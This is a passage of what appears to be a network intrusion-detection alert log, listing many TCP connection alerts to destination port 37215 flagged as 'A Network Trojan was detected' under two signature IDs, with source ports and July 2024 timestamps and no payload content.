                  SID:2829579
                  Source Port:33092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.781765
                  SID:2829579
                  Source Port:38450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959753
                  SID:2835222
                  Source Port:53198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.355450
                  SID:2835222
                  Source Port:50696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879798
                  SID:2829579
                  Source Port:40580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234468
                  SID:2835222
                  Source Port:33622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.496105
                  SID:2835222
                  Source Port:40922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.524750
                  SID:2835222
                  Source Port:55408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.878090
                  SID:2835222
                  Source Port:52006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.476492
                  SID:2829579
                  Source Port:54974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.948745
                  SID:2829579
                  Source Port:38034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.446098
                  SID:2835222
                  Source Port:38276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.141493
                  SID:2835222
                  Source Port:42998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.290610
                  SID:2835222
                  Source Port:53030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.859593
                  SID:2835222
                  Source Port:57744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.011649
                  SID:2835222
                  Source Port:51480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.423552
                  SID:2835222
                  Source Port:58056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867298
                  SID:2829579
                  Source Port:52936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.472198
                  SID:2829579
                  Source Port:33592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.644791
                  SID:2829579
                  Source Port:43516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171308
                  SID:2835222
                  Source Port:49880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2829579
                  Source Port:54952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.517659
                  SID:2835222
                  Source Port:56390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373070
                  SID:2829579
                  Source Port:43526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.057474
                  SID:2829579
                  Source Port:41228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.838798
                  SID:2829579
                  Source Port:45270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.669115
                  SID:2835222
                  Source Port:56804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.391296
                  SID:2835222
                  Source Port:35750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.424605
                  SID:2829579
                  Source Port:34012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.310052
                  SID:2835222
                  Source Port:51814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.117247
                  SID:2829579
                  Source Port:38436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.112829
                  SID:2835222
                  Source Port:50240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.029785
                  SID:2829579
                  Source Port:35470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.953506
                  SID:2835222
                  Source Port:46852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.402218
                  SID:2835222
                  Source Port:45692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.183650
                  SID:2829579
                  Source Port:55170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.877445
                  SID:2829579
                  Source Port:53620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.823629
                  SID:2829579
                  Source Port:53402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.633265
                  SID:2835222
                  Source Port:58648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881889
                  SID:2829579
                  Source Port:39648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098381
                  SID:2829579
                  Source Port:45648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433814
                  SID:2835222
                  Source Port:37648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632991
                  SID:2835222
                  Source Port:33826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.699441
                  SID:2829579
                  Source Port:34696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.933284
                  SID:2829579
                  Source Port:60866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.934350
                  SID:2835222
                  Source Port:36882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.485885
                  SID:2829579
                  Source Port:42944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.129379
                  SID:2835222
                  Source Port:40794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.265818
                  SID:2829579
                  Source Port:45688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2835222
                  Source Port:51296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847000
                  SID:2835222
                  Source Port:44438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.555900
                  SID:2835222
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.002170
                  SID:2829579
                  Source Port:46200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.379030
                  SID:2829579
                  Source Port:40858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.535495
                  SID:2835222
                  Source Port:60516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448470
                  SID:2835222
                  Source Port:59530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.786219
                  SID:2835222
                  Source Port:47322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.168870
                  SID:2829579
                  Source Port:34620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.928939
                  SID:2829579
                  Source Port:35030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.947291
                  SID:2829579
                  Source Port:43138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.851732
                  SID:2829579
                  Source Port:40656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885642
                  SID:2829579
                  Source Port:49070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.379433
                  SID:2829579
                  Source Port:35494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.161677
                  SID:2835222
                  Source Port:38670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.868107
                  SID:2835222
                  Source Port:46906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.557650
                  SID:2835222
                  Source Port:51802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.964611
                  SID:2829579
                  Source Port:42462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2835222
                  Source Port:36534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132351
                  SID:2829579
                  Source Port:46834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.869680
                  SID:2829579
                  Source Port:48556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.859922
                  SID:2829579
                  Source Port:44510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563036
                  SID:2835222
                  Source Port:46804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.854683
                  SID:2835222
                  Source Port:46084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.237677
                  SID:2829579
                  Source Port:36586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856706
                  SID:2835222
                  Source Port:58340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.844972
                  SID:2835222
                  Source Port:54878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.196369
                  SID:2829579
                  Source Port:55868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013363
                  SID:2829579
                  Source Port:41982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.858579
                  SID:2835222
                  Source Port:46598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177023
                  SID:2829579
                  Source Port:43310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.148084
                  SID:2835222
                  Source Port:41042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.761554
                  SID:2829579
                  Source Port:55150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926314
                  SID:2835222
                  Source Port:56864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505389
                  SID:2829579
                  Source Port:37206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.924577
                  SID:2835222
                  Source Port:58170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.795103
                  SID:2835222
                  Source Port:54488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.613127
                  SID:2835222
                  Source Port:42376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.357813
                  SID:2829579
                  Source Port:57502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.431726
                  SID:2835222
                  Source Port:49952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131322
                  SID:2829579
                  Source Port:46140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.756969
                  SID:2829579
                  Source Port:46434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.842727
                  SID:2829579
                  Source Port:55184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.994856
                  SID:2835222
                  Source Port:36274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997634
                  SID:2829579
                  Source Port:58134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366242
                  SID:2835222
                  Source Port:45044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.494169
                  SID:2829579
                  Source Port:37958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.318439
                  SID:2835222
                  Source Port:45520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.611140
                  SID:2829579
                  Source Port:35314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.011385
                  SID:2829579
                  Source Port:58604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.748241
                  SID:2829579
                  Source Port:55702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.845068
                  SID:2829579
                  Source Port:37686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.949060
                  SID:2835222
                  Source Port:58708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.698481
                  SID:2829579
                  Source Port:38646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.207255
                  SID:2835222
                  Source Port:59146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488012
                  SID:2829579
                  Source Port:53170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.996062
                  SID:2835222
                  Source Port:42782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.158700
                  SID:2829579
                  Source Port:47580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415369
                  SID:2835222
                  Source Port:36604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.562651
                  SID:2829579
                  Source Port:35912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.545437
                  SID:2835222
                  Source Port:35380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.623006
                  SID:2829579
                  Source Port:34404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.371486
                  SID:2835222
                  Source Port:60674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2835222
                  Source Port:58306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022283
                  SID:2835222
                  Source Port:49568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.768210
                  SID:2829579
                  Source Port:53612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.969390
                  SID:2835222
                  Source Port:34724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.576536
                  SID:2829579
                  Source Port:49156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.603168
                  SID:2829579
                  Source Port:56100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.974882
                  SID:2835222
                  Source Port:51704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.005706
                  SID:2829579
                  Source Port:47456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.515772
                  SID:2829579
                  Source Port:37384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.214564
                  SID:2829579
                  Source Port:42318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.223283
                  SID:2829579
                  Source Port:52858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.944387
                  SID:2835222
                  Source Port:58706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.107652
                  SID:2829579
                  Source Port:33874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.807445
                  SID:2829579
                  Source Port:35676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.874672
                  SID:2829579
                  Source Port:47956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.637294
                  SID:2835222
                  Source Port:57362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.888639
                  SID:2835222
                  Source Port:50506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.827128
                  SID:2829579
                  Source Port:38088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.417770
                  SID:2829579
                  Source Port:38778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.830687
                  SID:2829579
                  Source Port:59130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.436747
                  SID:2829579
                  Source Port:38498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.153335
                  SID:2835222
                  Source Port:51704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.951763
                  SID:2835222
                  Source Port:57554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.620224
                  SID:2835222
                  Source Port:39030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.980913
                  SID:2835222
                  Source Port:33602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.811396
                  SID:2835222
                  Source Port:58128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.820800
                  SID:2835222
                  Source Port:37406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2835222
                  Source Port:52090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.412870
                  SID:2835222
                  Source Port:35502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.464716
                  SID:2835222
                  Source Port:39564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2835222
                  Source Port:59198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.425818
                  SID:2829579
                  Source Port:45446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.922168
                  SID:2829579
                  Source Port:47752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.349676
                  SID:2829579
                  Source Port:56422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.248945
                  SID:2829579
                  Source Port:36886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027342
                  SID:2835222
                  Source Port:37712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.930785
                  SID:2835222
                  Source Port:39654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470125
                  SID:2829579
                  Source Port:40494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828285
                  SID:2835222
                  Source Port:52040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.781247
                  SID:2829579
                  Source Port:36746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.929780
                  SID:2835222
                  Source Port:58154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.549602
                  SID:2829579
                  Source Port:36908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.805912
                  SID:2835222
                  Source Port:52610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652224
                  SID:2829579
                  Source Port:38388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.576463
                  SID:2835222
                  Source Port:60660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.773656
                  SID:2835222
                  Source Port:53928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.307932
                  SID:2829579
                  Source Port:37896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.463838
                  SID:2835222
                  Source Port:52326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.622177
                  SID:2835222
                  Source Port:42898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.476399
                  SID:2835222
                  Source Port:43312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.565962
                  SID:2835222
                  Source Port:54672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217432
                  SID:2829579
                  Source Port:55758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.793102
                  SID:2835222
                  Source Port:40560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.284234
                  SID:2829579
                  Source Port:55574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629706
                  SID:2835222
                  Source Port:34104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.965936
                  SID:2835222
                  Source Port:52012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625884
                  SID:2829579
                  Source Port:35660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.246495
                  SID:2829579
                  Source Port:45670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460517
                  SID:2835222
                  Source Port:40830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.490780
                  SID:2829579
                  Source Port:43064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.661675
                  SID:2835222
                  Source Port:46762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369689
                  SID:2829579
                  Source Port:39770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2835222
                  Source Port:52128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.285885
                  SID:2835222
                  Source Port:35884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.945204
                  SID:2835222
                  Source Port:44556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2829579
                  Source Port:36850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.474239
                  SID:2829579
                  Source Port:37042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.942691
                  SID:2829579
                  Source Port:35816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.553944
                  SID:2829579
                  Source Port:44280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.524057
                  SID:2835222
                  Source Port:42608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.395459
                  SID:2829579
                  Source Port:50678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
